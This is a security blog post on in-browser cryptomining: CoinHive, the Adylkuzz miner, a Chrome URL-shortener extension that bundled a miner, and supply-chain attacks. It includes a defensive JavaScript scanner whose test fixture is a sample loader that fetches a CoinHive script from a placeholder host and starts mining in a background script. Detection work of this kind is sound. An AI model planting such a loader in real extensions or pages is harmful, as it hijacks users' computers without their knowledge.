Malware, cryptocurrencies, and providers
While 2016 saw the explosion of ransomware, another family of malware has for some time been appearing frequently in mass attacks: cryptominers.
The operating principle is simple and answers the question: "Why wait for the hypothetical payment of a ransom when you can directly exploit a victim's resources to generate income?" It relies on mining, the mechanism by which a cryptocurrency rewards participants for the transaction-verification work they perform.
In particular, the Adylkuzz malware discovered last May used the ETERNALBLUE exploit to establish a presence on servers exposed to the internet and mine the Monero cryptocurrency.
More recently, the CoinHive site made available to the public a JavaScript program for mining Monero. While the code itself is not malicious, the ubiquity of JavaScript on the web quickly led to attacks injecting the script into web pages to use visitors' browsers to mine this cryptocurrency without their knowledge. Two main scenarios have been identified:
- Malicious actors deploying the script on a victim site, either by directly exploiting a vulnerability or through an advertising network;
- Webmasters voluntarily installing the program to generate additional revenue from visits to their site.
We identified a third case during a routine investigation. A Chrome extension, Short URL (goo.gl), fortunately not very widespread, has since its latest version included a file, bit.js, containing the CoinHive JavaScript program, and appears to run it continuously as long as the extension is active.
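The scenarios above share one observable pattern: a copy of (or a loader for) the CoinHive library ends up in content the user never asked for, and a miner object is started. The following is an added example, not code from the original post or from the extension it describes: a small static scanner for a browser-extension bundle that flags those indicators and, using the manifest, notes when the miner sits in a background script (which keeps running while the extension is enabled, as the post observes). The indicator strings are taken from the public CoinHive JavaScript API as it was distributed at the time (an assumption about what a bundled copy still contains); the sample bundle, file contents and hostname are constructed for the demonstration.

```javascript
// Added example: static scan of a browser-extension bundle for in-browser
// cryptomining indicators (CoinHive-style library loaded and started without
// the user's knowledge). The sample files below are constructed; they are not
// the real "bit.js" from the extension discussed in the post.

// Indicator strings based on the public CoinHive JavaScript API of the time
// (assumption: a bundled or loaded copy keeps these names).
const MINER_INDICATORS = [
  { pattern: /coinhive\.min\.js/i, label: "CoinHive library include" },
  { pattern: /CoinHive\.(Anonymous|User)\s*\(/, label: "CoinHive miner constructor" },
  { pattern: /\.start\s*\(\s*\)/, label: "miner start() call" },
  { pattern: /cryptonight/i, label: "CryptoNight hashing reference" },
];

// Background scripts persist for as long as the extension is enabled, so a
// miner placed there runs continuously rather than per page.
function backgroundScripts(manifestText) {
  try {
    const manifest = JSON.parse(manifestText);
    return (manifest.background && manifest.background.scripts) || [];
  } catch (e) {
    return []; // unparsable manifest: treat as no background scripts
  }
}

// Scan every .js file of a bundle (a name -> content map). Returns one finding
// per (file, indicator) hit, plus a flag that is set only when a single
// background script both references the miner library/constructor and starts
// it; a bare .start() alone is too common to be an indicator on its own.
function scanExtensionBundle(files) {
  const findings = [];
  const bg = new Set(backgroundScripts(files["manifest.json"] || ""));
  const labelsByFile = {};
  for (const [name, content] of Object.entries(files)) {
    if (!name.endsWith(".js")) continue;
    for (const ind of MINER_INDICATORS) {
      if (ind.pattern.test(content)) {
        findings.push({ file: name, indicator: ind.label, background: bg.has(name) });
        (labelsByFile[name] = labelsByFile[name] || new Set()).add(ind.label);
      }
    }
  }
  const persistentMiner = Object.entries(labelsByFile).some(([name, labels]) =>
    bg.has(name) &&
    labels.has("miner start() call") &&
    (labels.has("CoinHive library include") || labels.has("CoinHive miner constructor")));
  return { findings, persistentMiner };
}

// Constructed sample: a URL-shortener extension whose latest version gained a
// background script that loads and starts a miner (modelled on the post).
const SAMPLE_BUNDLE = {
  "manifest.json": JSON.stringify({
    name: "Example Short URL",
    version: "2.0",
    background: { scripts: ["bit.js", "shorten.js"] },
    permissions: ["tabs"],
  }),
  "shorten.js": "chrome.tabs.onUpdated.addListener(() => { /* build short link */ });",
  "bit.js": [
    "var s = document.createElement('script');",
    "s.src = 'https://example.invalid/lib/coinhive.min.js';", // constructed hostname
    "document.head.appendChild(s);",
    "var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');",
    "miner.start();",
  ].join("\n"),
};

// Constructed control: the previous version of the same extension, no miner.
const CLEAN_BUNDLE = {
  "manifest.json": JSON.stringify({
    name: "Example Short URL",
    version: "1.9",
    background: { scripts: ["shorten.js"] },
  }),
  "shorten.js": "chrome.tabs.onUpdated.addListener(() => { /* build short link */ });",
};

console.log(JSON.stringify(scanExtensionBundle(SAMPLE_BUNDLE), null, 2));
```

Run with Node against an unpacked extension directory read into the same name-to-content map; the flagged-version report lists three hits in bit.js, all in a background script, and sets the persistent-miner flag, while the earlier clean version produces none. A string scan like this is cheap enough to run across an estate's installed extensions, but it only catches unobfuscated copies; a CPU-usage baseline per browser process remains the complementary signal.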
Even though the malicious activity here is small-scale and only results in excessive CPU usage for the victims, it is noteworthy in a context evolving towards targeted attacks on suppliers. For example, the Chrome extension Web Developer was targeted a few weeks ago and carried malicious code for a few days. On a different scale, the NotPetya infection spread through the compromise of the update system of the ME Docs software vendor. Finally, the attack distributing backdoored versions of CCleaner, first discovered two weeks ago, had potentially affected millions of users but ultimately targeted only a limited number of companies.
These events highlight the importance of having a clear view of the third-party solutions installed on an information system, in order to assess the impact of a compromise of any of these products. Guaranteeing the security of a component over which the company does not have complete control is impossible, but measures can still be implemented to reduce the attack surface, segment systems, and facilitate response during an incident. To conclude, and to return to NotPetya, adhering to "basic" hygiene rules on the segregation of privileged accounts was sufficient to neutralize the main effects of the malware.
